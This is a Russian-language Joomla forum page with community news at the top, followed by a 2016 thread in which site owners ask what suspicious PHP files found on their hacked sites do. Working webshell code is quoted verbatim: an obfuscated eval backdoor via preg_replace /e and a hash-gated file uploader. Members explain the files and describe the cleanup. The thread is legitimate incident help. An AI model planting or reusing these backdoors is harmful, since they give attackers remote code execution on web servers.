Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2148 Просмотров
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Взломали сайт, что делает код?
« : 16.07.2016, 14:38:32 »
Здравствуйте. Недавно обнаружил на своем сайте один подозрительный php файл, прогнал через ai-bolit, нашел множество файлов с одинаковым кодом (с разными именами), в разных директориях сайта. Что он делает?

1. файл:
Код
<?php isset($_POST['airq8i']) && ($www= $_POST['airq8i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

2. файл:
Код
<?php isset($_POST['340q10']) && ($www= $_POST['340q10']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

И все файлы в таком роде.

Я так понял если ему передать пост данные, то что он сделает?
« Последнее редактирование: 16.07.2016, 14:46:47 от Леон »
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сайт, что делает код?
« Ответ #1 : 16.07.2016, 14:52:14 »
Цитата: Леон от 16.07.2016, 14:38:32
Я так понял если ему передать пост данные, то что он сделает?
Выполнит то что ему указано  ^-^
Записан
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #2 : 16.07.2016, 14:59:46 »
Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #3 : 16.07.2016, 15:13:10 »
Цитата: Леон от 16.07.2016, 14:59:46
Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
Разные только параметры POST, все остальное одинаково
Записан
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #4 : 16.07.2016, 15:15:25 »
Нашел еще один файл на сайте, тут уже похоже форма загрузки файлов:
Код
<?php if(md5($_GET["ms-load"])=="cb8f68e224e682ef7f1b3747f3f749d4"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт, что делает код?
« Ответ #5 : 16.07.2016, 15:21:55 »
Она самая.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #6 : 16.07.2016, 15:32:11 »
Молодец, в верном направлении мыслишь!
Записан
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #7 : 19.07.2016, 14:02:05 »
Удалил все подозрительные файлы. Сменил пароли, обновил движок, поставил компонент Securitycheck Pro J3x. Прошло 2 дня, пока все чисто, прогонял еще раз ai-bolit'ом, ничего нового не появилось) Жаль не удалось узнать что именно эти вирусы делали.
Записан
*

Masha0701

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Re: Взломали сайт, что делает код?
« Ответ #8 : 01.12.2016, 10:31:03 »
Я так понимаю, это тоже инъекция ?

_______________
<?php if(md5($_GET["ms-load"])=="8e5c6d4f76b8a4c0593846e4aeffc38c"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
_________________________
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт, что делает код?
« Ответ #9 : 01.12.2016, 10:45:35 »
Похоже - да. А в файле есть проверка на вход через Joomla ?
Код
// no direct access
defined('_JEXEC') or die('Restricted access');
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #10 : 01.12.2016, 11:55:21 »
Цитата: Masha0701 от 01.12.2016, 10:31:03
Я так понимаю, это тоже инъекция ?
НЕТ! это называется уплодер))))
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт, что делает код?
« Ответ #11 : 01.12.2016, 11:58:25 »
Цитата: Masha0701 от 01.12.2016, 10:31:03
Я так понимаю, это тоже инъекция ?

Последствия ее. Лечить и обновлять.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус js.redirector.304

Автор tegos134

 Ответов: 1
Просмотров: 1563 		Последний ответ 24.08.2016, 22:18:17
от beliyadm
В Head появляется скрипт

Автор Zegeberg

 Ответов: 3
Просмотров: 1557 		Последний ответ 23.06.2016, 16:07:19
от Zegeberg
Проблемы с правами после смены хостинга

Автор Леон

 Ответов: 2
Просмотров: 1505 		Последний ответ 10.05.2016, 11:39:36
от Леон
Появляются новые пользователи "Super User" с логи

Автор crcp_kz

 Ответов: 9
Просмотров: 3010 		Последний ответ 25.04.2016, 11:54:06
от FitMe
Re: Два проникновения на сайт с обновленной Joomla

Автор Agard

 Ответов: 9
Просмотров: 1402 		Последний ответ 08.03.2016, 10:58:38
от winstrool